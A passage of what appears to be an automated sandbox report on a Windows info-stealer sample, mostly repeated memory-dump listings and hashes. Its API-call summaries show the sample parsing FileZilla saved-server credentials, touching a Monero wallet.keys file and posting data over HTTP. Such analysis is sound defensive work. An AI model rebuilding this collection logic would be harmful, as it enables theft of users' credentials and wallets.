                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ab6887dd2e5bfb9f6db07980e1272e659eaa959a4fbf0dc9897fd552fd1aa02e
                                        • Instruction ID: 482c90724ab224c32c5fc8a9eb22e38c2890dc5425c3c2149fe8d877aea8471f
                                        • Opcode Fuzzy Hash: ab6887dd2e5bfb9f6db07980e1272e659eaa959a4fbf0dc9897fd552fd1aa02e
                                        • Instruction Fuzzy Hash: A051D4F3E081109BE305AE29DC4576AF7E6EBA4720F1A853DDBC993384E935581586C2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8961ff7bc2a07ea00eda445e9511e3f42d431d4dd9651f8da9f9b8a2367b6825
                                        • Instruction ID: f48ebdb974f8e3f95fa9738ad92572057bf3821e1dd398269625f9f3391a599f
                                        • Opcode Fuzzy Hash: 8961ff7bc2a07ea00eda445e9511e3f42d431d4dd9651f8da9f9b8a2367b6825
                                        • Instruction Fuzzy Hash: 1D5176F3A182045BF3482E39DC8937AB7D6EB90310F1A423DDB89C77C4E83998048246
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f959a92b4dc0fbac29753da274bd9631a9c4240aa03cbbde59ecd42e1d91d15c
                                        • Instruction ID: d0332b57bfaaa2d9e4fe9fecdff56dcb8321f1abf1644cba4502f11d70837e7c
                                        • Opcode Fuzzy Hash: f959a92b4dc0fbac29753da274bd9631a9c4240aa03cbbde59ecd42e1d91d15c
                                        • Instruction Fuzzy Hash: E8510AF3D046109BF3056E28DC447A6B6D7DBD4325F2B853DDA88D3B84E9798D0542C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7c6c1d664fe67f1f39d699a8d9bb8a642f34cc1e1dff92e8b7299cb68bcd444f
                                        • Instruction ID: 0817dbf4f4725c08ed1e5bf63c6482a33bb9629abf1a292d5c51bc21ecaca048
                                        • Opcode Fuzzy Hash: 7c6c1d664fe67f1f39d699a8d9bb8a642f34cc1e1dff92e8b7299cb68bcd444f
                                        • Instruction Fuzzy Hash: C04135F3A08210ABE3146E69DC857ABFBDAEB98321F1B093DDB84D3740E575580083D6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 076791a192dcb2b58a70085ff01abaa2ecf333f356fe7bd0ba1a0190c18900f5
                                        • Instruction ID: 993dffeb8c0a1afd88e552ee0a79c6d92512dfdd28725dc10a21f4260b00c72e
                                        • Opcode Fuzzy Hash: 076791a192dcb2b58a70085ff01abaa2ecf333f356fe7bd0ba1a0190c18900f5
                                        • Instruction Fuzzy Hash: 21419AB390C310AFE705BF29D84562AFBE4EF91321F1A482DE6C587241E6749881CB97
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f34674c820bfa66f1fd75238b65572e503627a064bfa68cdd852f5691938def5
                                        • Instruction ID: b3770e8cfbca96ef162cb8e4e4905f36254933e35c7e89ce1d4ca2f877f5a936
                                        • Opcode Fuzzy Hash: f34674c820bfa66f1fd75238b65572e503627a064bfa68cdd852f5691938def5
                                        • Instruction Fuzzy Hash: C241E4F3A081109FE344AE28DC4577AB7D6EBD4320F1A853DE7D583784E939580487D6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5181c4cde81048769bcda19ef9c76a76e952292a41d82d3ec533faf8f42f4947
                                        • Instruction ID: 2e495c8c93e751108fcd86e9c1b0cae2a87180b42304657866fc347d47704301
                                        • Opcode Fuzzy Hash: 5181c4cde81048769bcda19ef9c76a76e952292a41d82d3ec533faf8f42f4947
                                        • Instruction Fuzzy Hash: 1F4148F3A082045BE3146A1DEC46B6AF7D5EBD0620F2E053DDFD497380E97AA9558382
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                        • Instruction ID: 42f08c4b90acee2f6298896bd4160bf577d537417592666e5969ee2cd2e78434
                                        • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                        • Instruction Fuzzy Hash: B7516B72E09BD98AC7058B7944502EEBFB26FE6200F1E829DC4985B382D23556C9C3E5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 518c2aecf6c44834efc35504ed1ffc61909674d0ac6245b2483b5a3d44269fdc
                                        • Instruction ID: 4b79b3a2e539c21578a177f911bff68d497f53153ade6d43f4b828e6c0b124a1
                                        • Opcode Fuzzy Hash: 518c2aecf6c44834efc35504ed1ffc61909674d0ac6245b2483b5a3d44269fdc
                                        • Instruction Fuzzy Hash: FE2128B250C308EFE319BF19DC81AAAFBE5FF58710F11491DEAD583250EB3168109A5B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                        • Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
                                        • Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                        • Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007C8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007C8F9B
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
                                          • Part of subcall function 007BA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007BA13C
                                          • Part of subcall function 007BA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 007BA161
                                          • Part of subcall function 007BA110: LocalAlloc.KERNEL32(00000040,?), ref: 007BA181
                                          • Part of subcall function 007BA110: ReadFile.KERNEL32(000000FF,?,00000000,007B148F,00000000), ref: 007BA1AA
                                          • Part of subcall function 007BA110: LocalFree.KERNEL32(007B148F), ref: 007BA1E0
                                          • Part of subcall function 007BA110: CloseHandle.KERNEL32(000000FF), ref: 007BA1EA
                                          • Part of subcall function 007C8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007C8FE2
                                        • GetProcessHeap.KERNEL32(00000000,000F423F,007D0DBF,007D0DBE,007D0DBB,007D0DBA), ref: 007C04C2
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007C04C9
                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 007C04E5
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007D0DB7), ref: 007C04F3
                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 007C052F
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007D0DB7), ref: 007C053D
                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 007C0579
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007D0DB7), ref: 007C0587
                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 007C05C3
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007D0DB7), ref: 007C05D5
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007D0DB7), ref: 007C0662
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007D0DB7), ref: 007C067A
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007D0DB7), ref: 007C0692
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007D0DB7), ref: 007C06AA
                                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 007C06C2
                                        • lstrcat.KERNEL32(?,profile: null), ref: 007C06D1
                                        • lstrcat.KERNEL32(?,url: ), ref: 007C06E0
                                        • lstrcat.KERNEL32(?,00000000), ref: 007C06F3
                                        • lstrcat.KERNEL32(?,007D1770), ref: 007C0702
                                        • lstrcat.KERNEL32(?,00000000), ref: 007C0715
                                        • lstrcat.KERNEL32(?,007D1774), ref: 007C0724
                                        • lstrcat.KERNEL32(?,login: ), ref: 007C0733
                                        • lstrcat.KERNEL32(?,00000000), ref: 007C0746
                                        • lstrcat.KERNEL32(?,007D1780), ref: 007C0755
                                        • lstrcat.KERNEL32(?,password: ), ref: 007C0764
                                        • lstrcat.KERNEL32(?,00000000), ref: 007C0777
                                        • lstrcat.KERNEL32(?,007D1790), ref: 007C0786
                                        • lstrcat.KERNEL32(?,007D1794), ref: 007C0795
                                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007D0DB7), ref: 007C07EE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                        • API String ID: 1942843190-555421843
                                        • Opcode ID: 153ce46066d8deaaccb12393b5b6f08aa83fef703ca5838b53f7f9f5a5320638
                                        • Instruction ID: 372bff652a47c012383efa48b082a54e13933bda0c92d54126d2e2ea0ddf7f94
                                        • Opcode Fuzzy Hash: 153ce46066d8deaaccb12393b5b6f08aa83fef703ca5838b53f7f9f5a5320638
                                        • Instruction Fuzzy Hash: 49D120B1A10208FBCB04EBE0DD9AFEE7739AF14305F50855DF102661A5EF38AA45CB65
                                        APIs
                                          • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
                                          • Part of subcall function 007B4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007B4889
                                          • Part of subcall function 007B4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 007B4899
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007B5A48
                                        • StrCmpCA.SHLWAPI(?,0165F1C0), ref: 007B5A63
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007B5BE3
                                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0165F2C0,00000000,?,0165E5B8,00000000,?,007D1B4C), ref: 007B5EC1
                                        • lstrlen.KERNEL32(00000000), ref: 007B5ED2
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 007B5EE3
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007B5EEA
                                        • lstrlen.KERNEL32(00000000), ref: 007B5EFF
                                        • lstrlen.KERNEL32(00000000), ref: 007B5F28
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 007B5F41
                                        • lstrlen.KERNEL32(00000000,?,?), ref: 007B5F6B
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 007B5F7F
                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 007B5F9C
                                        • InternetCloseHandle.WININET(00000000), ref: 007B6000
                                        • InternetCloseHandle.WININET(00000000), ref: 007B600D
                                        • HttpOpenRequestA.WININET(00000000,0165F380,?,0165ECD0,00000000,00000000,00400100,00000000), ref: 007B5C48
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                        • InternetCloseHandle.WININET(00000000), ref: 007B6017
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                         • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                        • String ID: "$"$------$------$------
                                        • API String ID: 874700897-2180234286
                                        • Opcode ID: 16792f4259e5f45da63d79fa819468de1cc85fb8811dc52850eb5d30098f9e20
                                        • Instruction ID: 5a8c03ac76fead945547e936e24917ad701c77109eb2ffa4c8e902e1fa80a168
                                        • Opcode Fuzzy Hash: 16792f4259e5f45da63d79fa819468de1cc85fb8811dc52850eb5d30098f9e20
                                        • Instruction Fuzzy Hash: 5F12C8B192011CFBCB15EBA0DCAAFEEB379AF14705F00419DB10662191EF786E49CB65
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                          • Part of subcall function 007C8CF0: GetSystemTime.KERNEL32(007D0E1B,0165E2E8,007D05B6,?,?,007B13F9,?,0000001A,007D0E1B,00000000,?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007C8D16
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007BD083
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 007BD1C7
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007BD1CE
                                        • lstrcat.KERNEL32(?,00000000), ref: 007BD308
                                        • lstrcat.KERNEL32(?,007D1570), ref: 007BD317
                                        • lstrcat.KERNEL32(?,00000000), ref: 007BD32A
                                        • lstrcat.KERNEL32(?,007D1574), ref: 007BD339
                                        • lstrcat.KERNEL32(?,00000000), ref: 007BD34C
